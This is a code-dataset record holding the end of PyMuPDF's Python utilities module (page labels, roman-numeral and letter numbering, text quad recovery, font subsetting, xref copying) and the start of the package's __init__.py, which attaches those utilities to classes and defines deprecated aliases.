labels: result of doc._get_page_labels().
Returns:
The label (str) of the page number. Errors return an empty string.
"""
# Jorj McKie, 2021-01-06
item = [x for x in labels if x[0] <= pgNo][-1]
rule = rule_dict(item)
prefix = rule.get("prefix", "")
style = rule.get("style", "")
pagenumber = pgNo - rule["startpage"] + rule["firstpagenum"]
return construct_label(style, prefix, pagenumber)
def get_label(page):
"""Return the label for this PDF page.
Args:
page: page object.
Returns:
The label (str) of the page. Errors return an empty string.
"""
# Jorj McKie, 2021-01-06
labels = page.parent._get_page_labels()
if not labels:
return ""
labels.sort()
return get_label_pno(page.number, labels)
def get_page_numbers(doc, label, only_one=False):
"""Return a list of page numbers with the given label.
Args:
doc: PDF document object (resp. 'self').
label: (str) label.
only_one: (bool) stop searching after first hit.
Returns:
List of page numbers having this label.
"""
# Jorj McKie, 2021-01-06
numbers = []
if not label:
return numbers
labels = doc._get_page_labels()
if labels == []:
return numbers
for i in range(doc.page_count):
plabel = get_label_pno(i, labels)
if plabel == label:
numbers.append(i)
if only_one:
break
return numbers
def construct_label(style, prefix, pno) -> str:
"""Construct a label based on style, prefix and page number."""
# William Chapman, 2021-01-06
n_str = ""
if style == "D":
n_str = str(pno)
elif style == "r":
n_str = integerToRoman(pno).lower()
elif style == "R":
n_str = integerToRoman(pno).upper()
elif style == "a":
n_str = integerToLetter(pno).lower()
elif style == "A":
n_str = integerToLetter(pno).upper()
result = prefix + n_str
return result
def integerToLetter(i) -> str:
"""Returns letter sequence string for integer i."""
# William Chapman, Jorj McKie, 2021-01-06
ls = string.ascii_uppercase
n, a = 1, i
while pow(26, n) <= a:
a -= int(math.pow(26, n))
n += 1
str_t = ""
for j in reversed(range(n)):
f, g = divmod(a, int(math.pow(26, j)))
str_t += ls[f]
a = g
return str_t
def integerToRoman(num: int) -> str:
"""Return roman numeral for an integer."""
# William Chapman, Jorj McKie, 2021-01-06
roman = (
(1000, "M"),
(900, "CM"),
(500, "D"),
(400, "CD"),
(100, "C"),
(90, "XC"),
(50, "L"),
(40, "XL"),
(10, "X"),
(9, "IX"),
(5, "V"),
(4, "IV"),
(1, "I"),
)
def roman_num(num):
for r, ltr in roman:
x, _ = divmod(num, r)
yield ltr * x
num -= r * x
if num <= 0:
break
return "".join([a for a in roman_num(num)])
def get_page_labels(doc):
"""Return page label definitions in PDF document.
Args:
doc: PDF document (resp. 'self').
Returns:
A list of dictionaries with the following format:
{'startpage': int, 'prefix': str, 'style': str, 'firstpagenum': int}.
"""
# Jorj McKie, 2021-01-10
return [rule_dict(item) for item in doc._get_page_labels()]
def set_page_labels(doc, labels):
"""Add / replace page label definitions in PDF document.
Args:
doc: PDF document (resp. 'self').
labels: list of label dictionaries like:
{'startpage': int, 'prefix': str, 'style': str, 'firstpagenum': int},
as returned by get_page_labels().
"""
# William Chapman, 2021-01-06
def create_label_str(label):
"""Convert Python label dict to correspnding PDF rule string.
Args:
label: (dict) build rule for the label.
Returns:
PDF label rule string wrapped in "<<", ">>".
"""
s = "%i<<" % label["startpage"]
if label.get("prefix", "") != "":
s += "/P(%s)" % label["prefix"]
if label.get("style", "") != "":
s += "/S/%s" % label["style"]
if label.get("firstpagenum", 1) > 1:
s += "/St %i" % label["firstpagenum"]
s += ">>"
return s
def create_nums(labels):
"""Return concatenated string of all labels rules.
Args:
labels: (list) dictionaries as created by function 'rule_dict'.
Returns:
PDF compatible string for page label definitions, ready to be
enclosed in PDF array 'Nums[...]'.
"""
labels.sort(key=lambda x: x["startpage"])
s = "".join([create_label_str(label) for label in labels])
return s
doc._set_page_labels(create_nums(labels))
# End of Page Label Code -------------------------------------------------
def has_links(doc: Document) -> bool:
"""Check whether there are links on any page."""
if doc.is_closed:
raise ValueError("document closed")
if not doc.is_pdf:
raise ValueError("is no PDF")
for i in range(doc.page_count):
for item in doc.page_annot_xrefs(i):
if item[1] == PDF_ANNOT_LINK:
return True
return False
def has_annots(doc: Document) -> bool:
"""Check whether there are annotations on any page."""
if doc.is_closed:
raise ValueError("document closed")
if not doc.is_pdf:
raise ValueError("is no PDF")
for i in range(doc.page_count):
for item in doc.page_annot_xrefs(i):
if not (item[1] == PDF_ANNOT_LINK or item[1] == PDF_ANNOT_WIDGET):
return True
return False
# -------------------------------------------------------------------
# Functions to recover the quad contained in a text extraction bbox
# -------------------------------------------------------------------
def recover_bbox_quad(line_dir: tuple, span: dict, bbox: tuple) -> Quad:
"""Compute the quad located inside the bbox.
The bbox may be any of the resp. tuples occurring inside the given span.
Args:
line_dir: (tuple) 'line["dir"]' of the owning line or None.
span: (dict) the span. May be from get_texttrace() method.
bbox: (tuple) the bbox of the span or any of its characters.
Returns:
The quad which is wrapped by the bbox.
"""
if line_dir == None:
line_dir = span["dir"]
cos, sin = line_dir
bbox = Rect(bbox) # make it a rect
if TOOLS.set_small_glyph_heights(): # ==> just fontsize as height
d = 1
else:
d = span["ascender"] - span["descender"]
height = d * span["size"] # the quad's rectangle height
# The following are distances from the bbox corners, at wich we find the
# respective quad points. The computation depends on in which quadrant
# the text writing angle is located.
hs = height * sin
hc = height * cos
if hc >= 0 and hs <= 0: # quadrant 1
ul = bbox.bl - (0, hc)
ur = bbox.tr + (hs, 0)
ll = bbox.bl - (hs, 0)
lr = bbox.tr + (0, hc)
elif hc <= 0 and hs <= 0: # quadrant 2
ul = bbox.br + (hs, 0)
ur = bbox.tl - (0, hc)
ll = bbox.br + (0, hc)
lr = bbox.tl - (hs, 0)
elif hc <= 0 and hs >= 0: # quadrant 3
ul = bbox.tr - (0, hc)
ur = bbox.bl + (hs, 0)
ll = bbox.tr - (hs, 0)
lr = bbox.bl + (0, hc)
else: # quadrant 4
ul = bbox.tl + (hs, 0)
ur = bbox.br - (0, hc)
ll = bbox.tl + (0, hc)
lr = bbox.br - (hs, 0)
return Quad(ul, ur, ll, lr)
def recover_quad(line_dir: tuple, span: dict) -> Quad:
"""Recover the quadrilateral of a text span.
Args:
line_dir: (tuple) 'line["dir"]' of the owning line.
span: the span.
Returns:
The quadrilateral enveloping the span's text.
"""
if type(line_dir) is not tuple or len(line_dir) != 2:
raise ValueError("bad line dir argument")
if type(span) is not dict:
raise ValueError("bad span argument")
return recover_bbox_quad(line_dir, span, span["bbox"])
def recover_line_quad(line: dict, spans: list = None) -> Quad:
"""Calculate the line quad for 'dict' / 'rawdict' text extractions.
The lower quad points are those of the first, resp. last span quad.
The upper points are determined by the maximum span quad height.
From this, compute a rect with bottom-left in (0, 0), convert this to a
quad and rotate and shift back to cover the text of the spans.
Args:
spans: (list, optional) sub-list of spans to consider.
Returns:
Quad covering selected spans.
"""
if spans == None: # no sub-selection
spans = line["spans"] # all spans
if len(spans) == 0:
raise ValueError("bad span list")
line_dir = line["dir"] # text direction
cos, sin = line_dir
q0 = recover_quad(line_dir, spans[0]) # quad of first span
if len(spans) > 1: # get quad of last span
q1 = recover_quad(line_dir, spans[-1])
else:
q1 = q0 # last = first
line_ll = q0.ll # lower-left of line quad
line_lr = q1.lr # lower-right of line quad
mat0 = planish_line(line_ll, line_lr)
# map base line to x-axis such that line_ll goes to (0, 0)
x_lr = line_lr * mat0
small = TOOLS.set_small_glyph_heights() # small glyph heights?
h = max(
[s["size"] * (1 if small else (s["ascender"] - s["descender"])) for s in spans]
)
line_rect = Rect(0, -h, x_lr.x, 0) # line rectangle
line_quad = line_rect.quad # make it a quad and:
line_quad *= ~mat0
return line_quad
def recover_span_quad(line_dir: tuple, span: dict, chars: list = None) -> Quad:
"""Calculate the span quad for 'dict' / 'rawdict' text extractions.
Notes:
There are two execution paths:
1. For the full span quad, the result of 'recover_quad' is returned.
2. For the quad of a sub-list of characters, the char quads are
computed and joined. This is only supported for the "rawdict"
extraction option.
Args:
line_dir: (tuple) 'line["dir"]' of the owning line.
span: (dict) the span.
chars: (list, optional) sub-list of characters to consider.
Returns:
Quad covering selected characters.
"""
if line_dir == None: # must be a span from get_texttrace()
line_dir = span["dir"]
if chars == None: # no sub-selection
return recover_quad(line_dir, span)
if not "chars" in span.keys():
raise ValueError("need 'rawdict' option to sub-select chars")
q0 = recover_char_quad(line_dir, span, chars[0]) # quad of first char
if len(chars) > 1: # get quad of last char
q1 = recover_char_quad(line_dir, span, chars[-1])
else:
q1 = q0 # last = first
span_ll = q0.ll # lower-left of span quad
span_lr = q1.lr # lower-right of span quad
mat0 = planish_line(span_ll, span_lr)
# map base line to x-axis such that span_ll goes to (0, 0)
x_lr = span_lr * mat0
small = TOOLS.set_small_glyph_heights() # small glyph heights?
h = span["size"] * (1 if small else (span["ascender"] - span["descender"]))
span_rect = Rect(0, -h, x_lr.x, 0) # line rectangle
span_quad = span_rect.quad # make it a quad and:
span_quad *= ~mat0 # rotate back and shift back
return span_quad
def recover_char_quad(line_dir: tuple, span: dict, char: dict) -> Quad:
"""Recover the quadrilateral of a text character.
This requires the "rawdict" option of text extraction.
Args:
line_dir: (tuple) 'line["dir"]' of the span's line.
span: (dict) the span dict.
char: (dict) the character dict.
Returns:
The quadrilateral enveloping the character.
"""
if line_dir == None:
line_dir = span["dir"]
if type(line_dir) is not tuple or len(line_dir) != 2:
raise ValueError("bad line dir argument")
if type(span) is not dict:
raise ValueError("bad span argument")
if type(char) is dict:
bbox = Rect(char["bbox"])
elif type(char) is tuple:
bbox = Rect(char[3])
else:
raise ValueError("bad span argument")
return recover_bbox_quad(line_dir, span, bbox)
# -------------------------------------------------------------------
# Building font subsets using fontTools
# -------------------------------------------------------------------
def subset_fonts(doc: Document, verbose: bool = False) -> None:
"""Build font subsets of a PDF. Requires package 'fontTools'.
Eligible fonts are potentially replaced by smaller versions. Page text is
NOT rewritten and thus should retain properties like being hidden or
controlled by optional content.
"""
# Font binaries: - "buffer" -> (names, xrefs, (unicodes, glyphs))
# An embedded font is uniquely defined by its fontbuffer only. It may have
# multiple names and xrefs.
# Once the sets of used unicodes and glyphs are known, we compute a
# smaller version of the buffer user package fontTools.
font_buffers = {}
def get_old_widths(xref):
"""Retrieve old font '/W' and '/DW' values."""
df = doc.xref_get_key(xref, "DescendantFonts")
if df[0] != "array": # only handle xref specifications
return None, None
df_xref = int(df[1][1:-1].replace("0 R", ""))
widths = doc.xref_get_key(df_xref, "W")
if widths[0] != "array": # no widths key found
widths = None
else:
widths = widths[1]
dwidths = doc.xref_get_key(df_xref, "DW")
if dwidths[0] != "int":
dwidths = None
else:
dwidths = dwidths[1]
return widths, dwidths
def set_old_widths(xref, widths, dwidths):
"""Restore the old '/W' and '/DW' in subsetted font.
If either parameter is None or evaluates to False, the corresponding
dictionary key will be set to null.
"""
df = doc.xref_get_key(xref, "DescendantFonts")
if df[0] != "array": # only handle xref specs
return None
df_xref = int(df[1][1:-1].replace("0 R", ""))
if (type(widths) is not str or not widths) and doc.xref_get_key(df_xref, "W")[
0
] != "null":
doc.xref_set_key(df_xref, "W", "null")
else:
doc.xref_set_key(df_xref, "W", widths)
if (type(dwidths) is not str or not dwidths) and doc.xref_get_key(
df_xref, "DW"
)[0] != "null":
doc.xref_set_key(df_xref, "DW", "null")
else:
doc.xref_set_key(df_xref, "DW", dwidths)
return None
def set_subset_fontname(new_xref):
"""Generate a name prefix to tag a font as subset.
We use a random generator to select 6 upper case ASCII characters.
The prefixed name must be put in the font xref as the "/BaseFont" value
and in the FontDescriptor object as the '/FontName' value.
"""
# The following generates a prefix like 'ABCDEF+'
prefix = "".join(random.choices(tuple(string.ascii_uppercase), k=6)) + "+"
font_str = doc.xref_object(new_xref, compressed=True)
font_str = font_str.replace("/BaseFont/", "/BaseFont/" + prefix)
df = doc.xref_get_key(new_xref, "DescendantFonts")
if df[0] == "array":
df_xref = int(df[1][1:-1].replace("0 R", ""))
fd = doc.xref_get_key(df_xref, "FontDescriptor")
if fd[0] == "xref":
fd_xref = int(fd[1].replace("0 R", ""))
fd_str = doc.xref_object(fd_xref, compressed=True)
fd_str = fd_str.replace("/FontName/", "/FontName/" + prefix)
doc.update_object(fd_xref, fd_str)
doc.update_object(new_xref, font_str)
return None
def build_subset(buffer, unc_set, gid_set):
"""Build font subset using fontTools.
Args:
buffer: (bytes) the font given as a binary buffer.
unc_set: (set) required glyph ids.
Returns:
Either None if subsetting is unsuccessful or the subset font buffer.
"""
try:
import fontTools.subset as fts
except ImportError:
print("This method requires fontTools to be installed.")
raise
tmp_dir = tempfile.gettempdir()
oldfont_path = f"{tmp_dir}/oldfont.ttf"
newfont_path = f"{tmp_dir}/newfont.ttf"
uncfile_path = f"{tmp_dir}/uncfile.txt"
args = [
oldfont_path,
"--retain-gids",
f"--output-file={newfont_path}",
"--layout-features='*'",
"--passthrough-tables",
"--ignore-missing-glyphs",
"--ignore-missing-unicodes",
"--symbol-cmap",
]
unc_file = open(
f"{tmp_dir}/uncfile.txt", "w"
) # store glyph ids or unicodes as file
if 0xFFFD in unc_set: # error unicode exists -> use glyphs
args.append(f"--gids-file={uncfile_path}")
gid_set.add(189)
unc_list = list(gid_set)
for unc in unc_list:
unc_file.write("%i\n" % unc)
else:
args.append(f"--unicodes-file={uncfile_path}")
unc_set.add(255)
unc_list = list(unc_set)
for unc in unc_list:
unc_file.write("%04x\n" % unc)
unc_file.close()
fontfile = open(oldfont_path, "wb") # store fontbuffer as a file
fontfile.write(buffer)
fontfile.close()
try:
os.remove(newfont_path) # remove old file
except:
pass
try: # invoke fontTools subsetter
fts.main(args)
font = Font(fontfile=newfont_path)
new_buffer = font.buffer
if len(font.valid_codepoints()) == 0:
new_buffer = None
except:
new_buffer = None
try:
os.remove(uncfile_path)
except:
pass
try:
os.remove(oldfont_path)
except:
pass
try:
os.remove(newfont_path)
except:
pass
return new_buffer
def repl_fontnames(doc):
"""Populate 'font_buffers'.
For each font candidate, store its xref and the list of names
by which PDF text may refer to it (there may be multiple).
"""
def norm_name(name):
"""Recreate font name that contains PDF hex codes.
E.g. #20 -> space, chr(32)
"""
while "#" in name:
p = name.find("#")
c = int(name[p + 1 : p + 3], 16)
name = name.replace(name[p : p + 3], chr(c))
return name
def get_fontnames(doc, item):
"""Return a list of fontnames for an item of page.get_fonts().
There may be multiple names e.g. for Type0 fonts.
"""
fontname = item[3]
names = [fontname]
fontname = doc.xref_get_key(item[0], "BaseFont")[1][1:]
fontname = norm_name(fontname)
if fontname not in names:
names.append(fontname)
descendents = doc.xref_get_key(item[0], "DescendantFonts")
if descendents[0] != "array":
return names
descendents = descendents[1][1:-1]
if descendents.endswith(" 0 R"):
xref = int(descendents[:-4])
descendents = doc.xref_object(xref, compressed=True)
p1 = descendents.find("/BaseFont")
if p1 >= 0:
p2 = descendents.find("/", p1 + 1)
p1 = min(descendents.find("/", p2 + 1), descendents.find(">>", p2 + 1))
fontname = descendents[p2 + 1 : p1]
fontname = norm_name(fontname)
if fontname not in names:
names.append(fontname)
return names
for i in range(doc.page_count):
for f in doc.get_page_fonts(i, full=True):
font_xref = f[0] # font xref
font_ext = f[1] # font file extension
basename = f[3] # font basename
if font_ext not in ( # skip if not supported by fontTools
"otf",
"ttf",
"woff",
"woff2",
):
continue
# skip fonts which already are subsets
if len(basename) > 6 and basename[6] == "+":
continue
extr = doc.extract_font(font_xref)
fontbuffer = extr[-1]
names = get_fontnames(doc, f)
name_set, xref_set, subsets = font_buffers.get(
fontbuffer, (set(), set(), (set(), set()))
)
xref_set.add(font_xref)
for name in names:
name_set.add(name)
font = Font(fontbuffer=fontbuffer)
name_set.add(font.name)
del font
font_buffers[fontbuffer] = (name_set, xref_set, subsets)
return None
def find_buffer_by_name(name):
for buffer in font_buffers.keys():
name_set, _, _ = font_buffers[buffer]
if name in name_set:
return buffer
return None
# -----------------
# main function
# -----------------
repl_fontnames(doc) # populate font information
if not font_buffers: # nothing found to do
if verbose:
print("No fonts to subset.")
return 0
old_fontsize = 0
new_fontsize = 0
for fontbuffer in font_buffers.keys():
old_fontsize += len(fontbuffer)
# Scan page text for usage of subsettable fonts
for page in doc:
# go through the text and extend set of used glyphs by font
# we use a modified MuPDF trace device, which delivers us glyph ids.
for span in page.get_texttrace():
if type(span) is not dict: # skip useless information
continue
fontname = span["font"][:33] # fontname for the span
buffer = find_buffer_by_name(fontname)
if buffer is None:
continue
name_set, xref_set, (set_ucs, set_gid) = font_buffers[buffer]
for c in span["chars"]:
set_ucs.add(c[0]) # unicode
set_gid.add(c[1]) # glyph id
font_buffers[buffer] = (name_set, xref_set, (set_ucs, set_gid))
# build the font subsets
for old_buffer in font_buffers.keys():
name_set, xref_set, subsets = font_buffers[old_buffer]
new_buffer = build_subset(old_buffer, subsets[0], subsets[1])
fontname = list(name_set)[0]
if new_buffer == None or len(new_buffer) >= len(old_buffer):
# subset was not created or did not get smaller
if verbose:
print(f"Cannot subset '{fontname}'.")
continue
if verbose:
print(f"Built subset of font '{fontname}'.")
val = doc._insert_font(fontbuffer=new_buffer) # store subset font in PDF
new_xref = val[0] # get its xref
set_subset_fontname(new_xref) # tag fontname as subset font
font_str = doc.xref_object( # get its object definition
new_xref,
compressed=True,
)
# walk through the original font xrefs and replace each by the subset def
for font_xref in xref_set:
# we need the original '/W' and '/DW' width values
width_table, def_width = get_old_widths(font_xref)
# ... and replace original font definition at xref with it
doc.update_object(font_xref, font_str)
# now copy over old '/W' and '/DW' values
if width_table or def_width:
set_old_widths(font_xref, width_table, def_width)
# 'new_xref' remains unused in the PDF and must be removed
# by garbage collection.
new_fontsize += len(new_buffer)
return old_fontsize - new_fontsize
# -------------------------------------------------------------------
# Copy XREF object to another XREF
# -------------------------------------------------------------------
def xref_copy(doc: Document, source: int, target: int, *, keep: list = None) -> None:
"""Copy a PDF dictionary object to another one given their xref numbers.
Args:
doc: PDF document object
source: source xref number
target: target xref number, the xref must already exist
keep: an optional list of 1st level keys in target that should not be
removed before copying.
Notes:
This works similar to the copy() method of dictionaries in Python. The
source may be a stream object.
"""
if doc.xref_is_stream(source):
# read new xref stream, maintaining compression
stream = doc.xref_stream_raw(source)
doc.update_stream(
target,
stream,
compress=False, # keeps source compression
new=True, # in case target is no stream
)
# empty the target completely, observe exceptions
if keep is None:
keep = []
for key in doc.xref_get_keys(target):
if key in keep:
continue
doc.xref_set_key(target, key, "null")
# copy over all source dict items
for key in doc.xref_get_keys(source):
item = doc.xref_get_key(source, key)
doc.xref_set_key(target, key, item[1])
return None
| 181,740 | Python | .py | 4,889 | 28.353242 | 203 | 0.538779 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,380 | __init__.py | pymupdf_PyMuPDF/src_classic/__init__.py | # ------------------------------------------------------------------------
# Copyright 2020-2022, Harald Lieder, mailto:harald.lieder@outlook.com
# License: GNU AFFERO GPL 3.0, https://www.gnu.org/licenses/agpl-3.0.html
#
# Part of "PyMuPDF", a Python binding for "MuPDF" (http://mupdf.com), a
# lightweight PDF, XPS, and E-book viewer, renderer and toolkit which is
# maintained and developed by Artifex Software, Inc. https://artifex.com.
# ------------------------------------------------------------------------
import sys
import glob
import os
if os.path.exists( 'fitz/__init__.py'):
if not glob.glob( 'fitz/_fitz*'):
print( '#' * 40)
print( '# Warning: current directory appears to contain an incomplete')
print( '# fitz/ installation directory so "import fitz" may fail.')
print( '# This can happen if current directory is a PyMuPDF source tree.')
print( '# Suggest changing to a different current directory.')
print( '#' * 40)
def message(text=''):
print(text)
from fitz_old.fitz_old import *
# Allow this to work:
# import fitz_old as fitz
# fitz.fitz.TEXT_ALIGN_CENTER
#
fitz = fitz_old
# define the supported colorspaces for convenience
fitz_old.csRGB = fitz_old.Colorspace(fitz_old.CS_RGB)
fitz_old.csGRAY = fitz_old.Colorspace(fitz_old.CS_GRAY)
fitz_old.csCMYK = fitz_old.Colorspace(fitz_old.CS_CMYK)
csRGB = fitz_old.csRGB
csGRAY = fitz_old.csGRAY
csCMYK = fitz_old.csCMYK
# create the TOOLS object.
#
# Unfortunately it seems that this is never be destructed even if we use an
# atexit() handler, which makes MuPDF's Memento list it as a leak. In fitz_old.i
# we use Memento_startLeaking()/Memento_stopLeaking() when allocating
# the Tools instance so at least the leak is marked as known.
#
TOOLS = fitz_old.Tools()
TOOLS.thisown = True
fitz_old.TOOLS = TOOLS
# This atexit handler runs, but doesn't cause ~Tools() to be run.
#
import atexit
def cleanup_tools(TOOLS):
# print(f'cleanup_tools: TOOLS={TOOLS} id(TOOLS)={id(TOOLS)}')
# print(f'TOOLS.thisown={TOOLS.thisown}')
del TOOLS
del fitz_old.TOOLS
atexit.register(cleanup_tools, TOOLS)
# Require that MuPDF matches fitz_old.TOOLS.mupdf_version(); also allow use with
# next minor version (e.g. 1.21.2 => 1.22), so we can test with mupdf master.
#
def v_str_to_tuple(s):
return tuple(map(int, s.split('.')))
def v_tuple_to_string(t):
return '.'.join(map(str, t))
mupdf_version_tuple = v_str_to_tuple(fitz_old.TOOLS.mupdf_version())
mupdf_version_tuple_required = v_str_to_tuple(fitz_old.VersionFitz)
mupdf_version_tuple_required_prev = (mupdf_version_tuple_required[0], mupdf_version_tuple_required[1]-1)
mupdf_version_tuple_required_next = (mupdf_version_tuple_required[0], mupdf_version_tuple_required[1]+1)
# copy functions in 'utils' to their respective fitz classes
import fitz_old.utils
from .table import find_tables
# ------------------------------------------------------------------------------
# General
# ------------------------------------------------------------------------------
fitz_old.recover_quad = fitz_old.utils.recover_quad
fitz_old.recover_bbox_quad = fitz_old.utils.recover_bbox_quad
fitz_old.recover_line_quad = fitz_old.utils.recover_line_quad
fitz_old.recover_span_quad = fitz_old.utils.recover_span_quad
fitz_old.recover_char_quad = fitz_old.utils.recover_char_quad
# ------------------------------------------------------------------------------
# Document
# ------------------------------------------------------------------------------
fitz_old.open = fitz_old.Document
fitz_old.Document._do_links = fitz_old.utils.do_links
fitz_old.Document.del_toc_item = fitz_old.utils.del_toc_item
fitz_old.Document.get_char_widths = fitz_old.utils.get_char_widths
fitz_old.Document.get_ocmd = fitz_old.utils.get_ocmd
fitz_old.Document.get_page_labels = fitz_old.utils.get_page_labels
fitz_old.Document.get_page_numbers = fitz_old.utils.get_page_numbers
fitz_old.Document.get_page_pixmap = fitz_old.utils.get_page_pixmap
fitz_old.Document.get_page_text = fitz_old.utils.get_page_text
fitz_old.Document.get_toc = fitz_old.utils.get_toc
fitz_old.Document.has_annots = fitz_old.utils.has_annots
fitz_old.Document.has_links = fitz_old.utils.has_links
fitz_old.Document.insert_page = fitz_old.utils.insert_page
fitz_old.Document.new_page = fitz_old.utils.new_page
fitz_old.Document.scrub = fitz_old.utils.scrub
fitz_old.Document.search_page_for = fitz_old.utils.search_page_for
fitz_old.Document.set_metadata = fitz_old.utils.set_metadata
fitz_old.Document.set_ocmd = fitz_old.utils.set_ocmd
fitz_old.Document.set_page_labels = fitz_old.utils.set_page_labels
fitz_old.Document.set_toc = fitz_old.utils.set_toc
fitz_old.Document.set_toc_item = fitz_old.utils.set_toc_item
fitz_old.Document.tobytes = fitz_old.Document.write
fitz_old.Document.subset_fonts = fitz_old.utils.subset_fonts
fitz_old.Document.get_oc = fitz_old.utils.get_oc
fitz_old.Document.set_oc = fitz_old.utils.set_oc
fitz_old.Document.xref_copy = fitz_old.utils.xref_copy
# ------------------------------------------------------------------------------
# Page
# ------------------------------------------------------------------------------
fitz_old.Page.apply_redactions = fitz_old.utils.apply_redactions
fitz_old.Page.delete_widget = fitz_old.utils.delete_widget
fitz_old.Page.draw_bezier = fitz_old.utils.draw_bezier
fitz_old.Page.draw_circle = fitz_old.utils.draw_circle
fitz_old.Page.draw_curve = fitz_old.utils.draw_curve
fitz_old.Page.draw_line = fitz_old.utils.draw_line
fitz_old.Page.draw_oval = fitz_old.utils.draw_oval
fitz_old.Page.draw_polyline = fitz_old.utils.draw_polyline
fitz_old.Page.draw_quad = fitz_old.utils.draw_quad
fitz_old.Page.draw_rect = fitz_old.utils.draw_rect
fitz_old.Page.draw_sector = fitz_old.utils.draw_sector
fitz_old.Page.draw_squiggle = fitz_old.utils.draw_squiggle
fitz_old.Page.draw_zigzag = fitz_old.utils.draw_zigzag
fitz_old.Page.get_links = fitz_old.utils.get_links
fitz_old.Page.get_pixmap = fitz_old.utils.get_pixmap
fitz_old.Page.get_text = fitz_old.utils.get_text
fitz_old.Page.get_image_info = fitz_old.utils.get_image_info
fitz_old.Page.get_text_blocks = fitz_old.utils.get_text_blocks
fitz_old.Page.get_text_selection = fitz_old.utils.get_text_selection
fitz_old.Page.get_text_words = fitz_old.utils.get_text_words
fitz_old.Page.get_textbox = fitz_old.utils.get_textbox
fitz_old.Page.insert_image = fitz_old.utils.insert_image
fitz_old.Page.insert_link = fitz_old.utils.insert_link
fitz_old.Page.insert_text = fitz_old.utils.insert_text
fitz_old.Page.insert_textbox = fitz_old.utils.insert_textbox
fitz_old.Page.new_shape = lambda x: fitz_old.utils.Shape(x)
fitz_old.Page.search_for = fitz_old.utils.search_for
fitz_old.Page.show_pdf_page = fitz_old.utils.show_pdf_page
fitz_old.Page.update_link = fitz_old.utils.update_link
fitz_old.Page.write_text = fitz_old.utils.write_text
fitz_old.Page.get_label = fitz_old.utils.get_label
fitz_old.Page.get_image_rects = fitz_old.utils.get_image_rects
fitz_old.Page.get_textpage_ocr = fitz_old.utils.get_textpage_ocr
fitz_old.Page.delete_image = fitz_old.utils.delete_image
fitz_old.Page.replace_image = fitz_old.utils.replace_image
fitz_old.Page.find_tables = find_tables
# ------------------------------------------------------------------------
# Annot
# ------------------------------------------------------------------------
fitz_old.Annot.get_text = fitz_old.utils.get_text
fitz_old.Annot.get_textbox = fitz_old.utils.get_textbox
# ------------------------------------------------------------------------
# Rect and IRect
# ------------------------------------------------------------------------
fitz_old.Rect.get_area = fitz_old.utils.get_area
fitz_old.IRect.get_area = fitz_old.utils.get_area
# ------------------------------------------------------------------------
# TextWriter
# ------------------------------------------------------------------------
fitz_old.TextWriter.fill_textbox = fitz_old.utils.fill_textbox
class FitzDeprecation(DeprecationWarning):
pass
def restore_aliases():
import warnings
warnings.filterwarnings(
"once",
category=FitzDeprecation,
)
def showthis(msg, cat, filename, lineno, file=None, line=None):
text = warnings.formatwarning(msg, cat, filename, lineno, line=line)
s = text.find("FitzDeprecation")
if s < 0:
print(text, file=sys.stderr)
return
text = text[s:].splitlines()[0][4:]
print(text, file=sys.stderr)
warnings.showwarning = showthis
def _alias(fitz_class, old, new):
fname = getattr(fitz_class, new)
r = str(fitz_class)[1:-1]
objname = " ".join(r.split()[:2])
objname = objname.replace("fitz_old.fitz_old.", "")
objname = objname.replace("fitz_old.utils.", "")
if callable(fname):
def deprecated_function(*args, **kw):
msg = "'%s' removed from %s after v1.19 - use '%s'." % (
old,
objname,
new,
)
if not VersionBind.startswith("1.18"):
warnings.warn(msg, category=FitzDeprecation)
return fname(*args, **kw)
setattr(fitz_class, old, deprecated_function)
else:
if type(fname) is property:
setattr(fitz_class, old, property(fname.fget))
else:
setattr(fitz_class, old, fname)
eigen = getattr(fitz_class, old)
x = fname.__doc__
if not x:
x = ""
try:
if callable(fname) or type(fname) is property:
eigen.__doc__ = (
"*** Deprecated and removed after v1.19 - use '%s'. ***\n" % new + x
)
except:
pass
# deprecated Document aliases
_alias(fitz_old.Document, "chapterCount", "chapter_count")
_alias(fitz_old.Document, "chapterPageCount", "chapter_page_count")
_alias(fitz_old.Document, "convertToPDF", "convert_to_pdf")
_alias(fitz_old.Document, "copyPage", "copy_page")
_alias(fitz_old.Document, "deletePage", "delete_page")
_alias(fitz_old.Document, "deletePageRange", "delete_pages")
_alias(fitz_old.Document, "embeddedFileAdd", "embfile_add")
_alias(fitz_old.Document, "embeddedFileCount", "embfile_count")
_alias(fitz_old.Document, "embeddedFileDel", "embfile_del")
_alias(fitz_old.Document, "embeddedFileGet", "embfile_get")
_alias(fitz_old.Document, "embeddedFileInfo", "embfile_info")
_alias(fitz_old.Document, "embeddedFileNames", "embfile_names")
_alias(fitz_old.Document, "embeddedFileUpd", "embfile_upd")
_alias(fitz_old.Document, "extractFont", "extract_font")
_alias(fitz_old.Document, "extractImage", "extract_image")
_alias(fitz_old.Document, "findBookmark", "find_bookmark")
_alias(fitz_old.Document, "fullcopyPage", "fullcopy_page")
_alias(fitz_old.Document, "getCharWidths", "get_char_widths")
_alias(fitz_old.Document, "getOCGs", "get_ocgs")
_alias(fitz_old.Document, "getPageFontList", "get_page_fonts")
_alias(fitz_old.Document, "getPageImageList", "get_page_images")
_alias(fitz_old.Document, "getPagePixmap", "get_page_pixmap")
_alias(fitz_old.Document, "getPageText", "get_page_text")
_alias(fitz_old.Document, "getPageXObjectList", "get_page_xobjects")
_alias(fitz_old.Document, "getSigFlags", "get_sigflags")
_alias(fitz_old.Document, "getToC", "get_toc")
_alias(fitz_old.Document, "getXmlMetadata", "get_xml_metadata")
_alias(fitz_old.Document, "insertPage", "insert_page")
_alias(fitz_old.Document, "insertPDF", "insert_pdf")
_alias(fitz_old.Document, "isDirty", "is_dirty")
_alias(fitz_old.Document, "isFormPDF", "is_form_pdf")
_alias(fitz_old.Document, "isPDF", "is_pdf")
_alias(fitz_old.Document, "isReflowable", "is_reflowable")
_alias(fitz_old.Document, "isRepaired", "is_repaired")
_alias(fitz_old.Document, "isStream", "xref_is_stream")
_alias(fitz_old.Document, "is_stream", "xref_is_stream")
_alias(fitz_old.Document, "lastLocation", "last_location")
_alias(fitz_old.Document, "loadPage", "load_page")
_alias(fitz_old.Document, "makeBookmark", "make_bookmark")
_alias(fitz_old.Document, "metadataXML", "xref_xml_metadata")
_alias(fitz_old.Document, "movePage", "move_page")
_alias(fitz_old.Document, "needsPass", "needs_pass")
_alias(fitz_old.Document, "newPage", "new_page")
_alias(fitz_old.Document, "nextLocation", "next_location")
_alias(fitz_old.Document, "pageCount", "page_count")
_alias(fitz_old.Document, "pageCropBox", "page_cropbox")
